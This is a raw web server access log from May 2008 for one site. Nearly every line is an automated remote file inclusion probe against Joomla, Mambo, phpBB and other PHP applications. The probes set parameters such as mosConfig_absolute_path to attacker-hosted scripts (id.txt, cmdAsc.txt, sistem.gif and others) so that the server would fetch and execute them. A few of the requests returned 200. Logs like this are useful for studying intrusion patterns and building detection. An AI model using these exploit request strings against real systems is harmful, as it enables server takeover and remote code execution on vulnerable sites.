74.52.112.2 - - [29/May/2008:10:40:18 -0700] "GET /logs/access_080327.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:40:20 -0700] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:10:41:03 -0700] "GET /index2.php?content=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:10:41:03 -0700] "GET /logs/index2.php?content=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:41:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:41:11 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:41:15 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:41:21 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:41:28 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:10:41:46 -0700] "GET /index2.php?content=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:10:41:46 -0700] "GET /logs/index2.php?content=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:10:41:51 -0700] "GET /logs/access.log/main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:10:42:10 -0700] "GET /index2.php?content=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:10:42:10 -0700] "GET /logs/index2.php?content=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:42:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:42:12 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:42:29 -0700] "GET /logs/access_080207.log/index1.php?menu=http://scaneru.nm.ru/idv.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:42:29 -0700] "GET /index1.php?menu=http://scaneru.nm.ru/idv.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:42:29 -0700] "GET /logs/access_080127.log/index1.php?menu=http://scaneru.nm.ru/idv.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:42:29 -0700] "GET /logs/index1.php?menu=http://scaneru.nm.ru/idv.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:42:43 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:42:51 -0700] "GET //common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:42:53 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:43:03 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:43:04 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:43:08 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:43:09 -0700] "GET //index.php?pagina=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:43:10 -0700] "GET /logs//index.php?pagina=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:43:13 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:10:43:31 -0700] "GET /logs/access_080205.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:43:32 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:10:43:32 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:10:43:32 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:10:43:54 -0700] "GET /logs/errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:10:43:55 -0700] "GET /errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:10:44:06 -0700] "GET /logs/access_080216.log/main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:44:59 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:45:08 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:45:11 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:45:16 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:45:16 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:45:18 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.131.142.223 - - [29/May/2008:10:45:26 -0700] "GET /logs/access_080215.log/www.amazonas.clhttp://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.131.142.223 - - [29/May/2008:10:45:26 -0700] "GET /logs/www.amazonas.clhttp://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.131.142.223 - - [29/May/2008:10:45:26 -0700] "GET /logs/access_080217.log/www.amazonas.clhttp://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:10:45:43 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.92.45 - - [29/May/2008:10:45:45 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.pokaldepot.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [29/May/2008:10:45:46 -0700] "GET /index.php?sourcedir=http://www.pokaldepot.de/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [29/May/2008:10:45:47 -0700] "GET /logs/index.php?sourcedir=http://www.pokaldepot.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [29/May/2008:10:45:47 -0700] "GET /logs/access_080213.log/index.php?sourcedir=http://www.pokaldepot.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:10:45:52 -0700] "GET /logs/errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:10:45:52 -0700] "GET /errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [29/May/2008:10:46:07 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [29/May/2008:10:46:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [29/May/2008:10:46:08 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:10:46:38 -0700] "GET /logs/home.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:10:46:38 -0700] "GET /home.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:46:44 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:46:45 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:46:49 -0700] "GET /logs/access_080327.log//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.30.73.117 - - [29/May/2008:10:47:06 -0700] "GET /logs/source/mod/rss/channeledit.php?Codebase=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.92.23.89 - - [29/May/2008:10:47:10 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [29/May/2008:10:47:11 -0700] "GET /source/mod/rss/channeledit.php?Codebase=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:47:14 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:47:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:47:17 -0700] "GET /logs/access_080327.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.92.23.89 - - [29/May/2008:10:47:18 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.131.142.223 - - [29/May/2008:10:47:19 -0700] "GET /www.amazonas.clhttp://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.0.211.58 - - [29/May/2008:10:47:20 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.0.211.58 - - [29/May/2008:10:47:20 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.0.211.58 - - [29/May/2008:10:47:20 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:47:27 -0700] "GET /logs/access_080327.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:47:28 -0700] "GET /logs/access_080218.log//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:47:28 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:47:29 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:47:29 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:47:29 -0700] "GET //////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:47:30 -0700] "GET /logs//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 49567 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:47:45 -0700] "GET /logs/access_071230.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:47:45 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:47:45 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.92.23.89 - - [29/May/2008:10:47:53 -0700] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:48:06 -0700] "GET /logs/access_080216.log/main.php?x=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:10:48:26 -0700] "GET /logs/access_080218.log//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:10:48:28 -0700] "GET //////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:10:48:29 -0700] "GET /logs//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 49567 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:49:06 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:10:49:26 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:10:49:26 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:10:49:26 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:10:49:31 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:10:49:31 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:10:49:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [29/May/2008:10:49:50 -0700] "GET /sub.php?s=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [29/May/2008:10:49:53 -0700] "GET /logs/sub.php?s=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.137.42.35 - - [29/May/2008:10:50:34 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:50:35 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:50:35 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:50:37 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.175 - - [29/May/2008:10:51:25 -0700] "GET /bikes/dteel/140CANON/?S=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.92.23.89 - - [29/May/2008:10:51:28 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:52:06 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:52:08 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [29/May/2008:10:52:21 -0700] "GET /logs/index.php?sourcedir=http://www.pokaldepot.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [29/May/2008:10:52:23 -0700] "GET /index.php?sourcedir=http://www.pokaldepot.de/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
208.131.142.223 - - [29/May/2008:10:52:27 -0700] "GET /logs/access_080315.log/www.amazonas.clhttp://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.49.105 - - [29/May/2008:10:52:45 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.49.105 - - [29/May/2008:10:52:45 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.49.105 - - [29/May/2008:10:52:45 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:52:51 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:52:51 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:52:51 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:52:54 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
